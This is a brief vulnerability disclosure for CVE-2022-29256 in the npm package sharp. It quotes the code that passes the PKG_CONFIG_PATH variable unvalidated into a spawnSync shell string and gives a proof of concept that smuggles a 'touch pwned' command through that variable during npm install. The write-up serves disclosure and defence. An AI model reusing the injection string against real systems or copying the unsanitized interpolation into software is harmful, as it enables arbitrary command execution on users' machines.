CVE-2022-29256: OS Command Injection in sharp

- 1 min


sharp prior to version 0.30.4 is vulnerable to OS command injection. The environment PKG_CONFIG_PATH variable is used to check the pre-built dependency version and concatenated without any validation and promptly used by the spawnSync command method while post-installation of the package.

Vulnerable snippet

// lib/libvips.js
66: const globalLibvipsVersion = function () {
67:   if (process.platform !== 'win32') {
68:     const globalLibvipsVersion = spawnSync(`PKG_CONFIG_PATH="${pkgConfigPath()}" pkg-config --modversion vips-cpp`, spawnSyncOptions).stdout;
69:     /* istanbul ignore next */
70:     return (globalLibvipsVersion || '').trim();
71: // SNIPPED


Sink sort by backtrace.

Proof of Concept

The vulnerable function was invoked during the post-installation of its package.

$ export PKG_CONFIG_PATH='"; touch pwned #'
$ ls -l
total 0
$ npm install sharp --silent
sharp: Using cached /home/dw1/.npm/_libvips/
sharp: Integrity check passed for linux-x64
+ [email protected]
added 67 packages from 204 contributors and audited 67 packages in 5.919s

8 packages are looking for funding
  run `npm fund` for details

found 0 vulnerabilities

$ find . -name "pwned"


This issue lead to a arbitrary command execution.